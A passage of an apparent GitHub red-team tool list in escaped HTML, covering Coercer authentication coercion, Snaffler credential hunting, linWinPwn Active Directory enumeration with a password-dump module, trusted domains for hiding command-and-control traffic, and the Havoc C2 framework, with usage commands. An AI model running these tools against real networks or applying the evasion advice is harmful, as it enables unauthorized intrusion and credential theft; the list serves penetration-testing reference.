height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)\u003c/li\u003e\n\u003cli\u003eTries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)\u003c/li\u003e\n\u003cli\u003eCalls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.\u003c/li\u003e\n\u003cli\u003eRandom UNC paths generation to avoid caching failed attempts (all modes)\u003c/li\u003e\n\u003cli\u003eConfigurable delay between attempts with --delay\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003eMore feature information \u003ca href=\"https://github.com/p0dalirius/Coercer#features\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo python3 -m pip install coercer\"\u003e\u003cpre\u003esudo python3 -m pip install 
coercer\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Scan mode (Assess the Remote Procedure Calls listening on a machine)\n./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n\n# Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)\n./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\n\n# Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)\n./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan mode (Assess the Remote Procedure Calls listening on a machine)\u003c/span\u003e\n./Coercer.py scan -t 192.168.1.1 -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eusername\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epassword\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -d test.locl -v\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)\u003c/span\u003e\n./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eusername\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epassword\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -d test.locl -v\n\n\u003cspan 
class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)\u003c/span\u003e\n./Coercer.py fuzz -t 192.168.1.1 -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eusername\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epassword\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -d test.locl -v\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/p0dalirius/Coercer#quick-start\"\u003ehttps://github.com/p0dalirius/Coercer#quick-start\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eCollection\u003c/h1\u003e\u003ca id=\"user-content-collection\" class=\"anchor\" aria-label=\"Permalink: Collection\" href=\"#collection\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 
1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/BloodHoundAD/BloodHound\"\u003eBloodHound\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-bloodhound\" class=\"anchor\" aria-label=\"Permalink: 🔙BloodHound\" href=\"#bloodhound\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAn application used to visualize active directory environments. 
A quick way to visualize attack paths and understand victims' Active Directory properties.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e \u003ca href=\"https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/\" rel=\"nofollow\"\u003ePenTestPartners Walkthrough\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCustom Queries:\u003c/strong\u003e \u003ca href=\"https://github.com/CompassSecurity/BloodHoundQueries\"\u003eCompassSecurity BloodHoundQueries\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/SnaffCon/Snaffler\"\u003eSnaffler\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-snaffler\" class=\"anchor\" aria-label=\"Permalink: 🔙Snaffler\" href=\"#snaffler\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 
0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSnaffler is an advanced credential scanner/collector for Active Directory environments. \u003cem\u003eWith a great \u003ca href=\"https://github.com/SnaffCon/Snaffler/blob/master/README.md\"\u003eREADME\u003c/a\u003e\u003c/em\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSnaffler uses a system of \"classifiers\", each of which examines shares, folders, files or file contents, passing some items downstream to the next classifier and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eMore information about Snaffler \u003ca href=\"https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset\"\u003erules\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e'\u003cem\u003eBroadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.\u003c/em\u003e' - Snaffler README (2023)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download the binary from the \u003ca href=\"https://github.com/SnaffCon/Snaffler/releases\"\u003eGitHub Releases Page\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Targeted local scan (less likely to trigger detections)\nSnaffler.exe -s -i C:\\\n\n# Go in loud and find everything\nsnaffler.exe -s -o snaffler.log\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan 
class=\"pl-c\"\u003e#\u003c/span\u003e Targeted local scan (less likely to trigger detections)\u003c/span\u003e\nSnaffler.exe -s -i C:\\\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Go in loud and find everything\u003c/span\u003e\nsnaffler.exe -s -o snaffler.log\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/SnaffCon/Snaffler#what-does-it-look-like\"\u003ehttps://github.com/SnaffCon/Snaffler#what-does-it-look-like\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/lefayjey/linWinPwn\"\u003elinWinPwn\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-linwinpwn\" class=\"anchor\" aria-label=\"Permalink: 🔙linWinPwn\" href=\"#linwinpwn\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 
0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003elinWinPwn is a bash script that automates a number of Active Directory enumeration and vulnerability checks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe script uses a number of tools and serves as a wrapper around them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003elinWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/lefayjey/linWinPwn\ncd linWinPwn; chmod +x linWinPwn.sh\nchmod +x install.sh\n./install.sh\"\u003e\u003cpre\u003egit clone https://github.com/lefayjey/linWinPwn\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e linWinPwn\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e chmod +x linWinPwn.sh\nchmod +x install.sh\n./install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Default: interactive - Open interactive menu to run checks separately\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; [-d \u0026lt;AD_domain\u0026gt; -u \u0026lt;AD_user\u0026gt; -p \u0026lt;AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u0026gt; -o \u0026lt;output_dir\u0026gt;]\n\n# Auto config - Run NTP sync with target DC and add entry to /etc/hosts 
before running the modules\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; --auto-config\n\n# LDAPS - Use LDAPS instead of LDAP (port 636)\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; --ldaps\n\n# Module pwd_dump: Password Dump\n./linWinPwn.sh -t \u0026lt;Domain_Controller_IP\u0026gt; -M pwd_dump [-d \u0026lt;AD_domain\u0026gt; -u \u0026lt;AD_user\u0026gt; -p \u0026lt;AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u0026gt; -o \u0026lt;output_dir\u0026gt;]\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Default: interactive - Open interactive menu to run checks separately\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e [-d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_domain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-u\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_user\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-p\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-o\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eoutput_dir\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e --auto-config\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e LDAPS - 
Use LDAPS instead of LDAP (port 636)\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e --ldaps\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Module pwd_dump: Password Dump\u003c/span\u003e\n./linWinPwn.sh -t \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eDomain_Controller_IP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -M pwd_dump [-d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_domain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-u\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_user\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-p\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eAD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-o\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eoutput_dir\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information \u003ca href=\"https://github.com/lefayjey/linWinPwn#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca 
href=\"https://github.com/lefayjey/linWinPwn#demos\"\u003ehttps://github.com/lefayjey/linWinPwn#demos\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eCommand and Control\u003c/h1\u003e\u003ca id=\"user-content-command-and-control\" class=\"anchor\" aria-label=\"Permalink: Command and Control\" href=\"#command-and-control\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://lots-project.com/\" rel=\"nofollow\"\u003eLiving Off Trusted Sites Project\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-living-off-trusted-sites-project\" class=\"anchor\" aria-label=\"Permalink: 🔙Living Off Trusted Sites Project\" href=\"#living-off-trusted-sites-project\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 
0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eC2 implants can be detected by defenders looking for unusual network traffic to uncommon domains. Additionally proxy solutions can sometimes block connections to untrusted domains.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBeing able to hide your C2 traffic via a trusted domain will help you to stay undetected and reduce the likelihood of being blocked at the proxy level by security solutions.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis resource contains a list of trusted sites that can be used.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"https://lots-project.com/\" rel=\"nofollow\"\u003ehttps://lots-project.com/\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSearch for \u003ccode\u003e+C\u0026amp;C\u003c/code\u003e in the search bar to view all potential domains / subdomains that can be used for command and control operations.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eResults include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eraw.githubusercontent.com\u003c/li\u003e\n\u003cli\u003edocs.google.com\u003c/li\u003e\n\u003cli\u003e*.azurewebsites.net\u003c/li\u003e\n\u003cli\u003edropbox.com\u003c/li\u003e\n\u003cli\u003e*.amazonaws.com\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png\"\u003e\u003cimg 
src=\"https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://lots-project.com/\" rel=\"nofollow\"\u003ehttps://lots-project.com/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/HavocFramework/Havoc\"\u003eHavoc\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-havoc\" class=\"anchor\" aria-label=\"Permalink: 🔙Havoc\" href=\"#havoc\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eHavoc is a modern and malleable post-exploitation command and control framework, created by \u003ca href=\"https://twitter.com/C5pider\" rel=\"nofollow\"\u003e@C5pider\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePre-requisites:\u003c/strong\u003e (Ubuntu 20.04 / 22.04)\u003c/p\u003e\n\u003cdiv class=\"highlight 
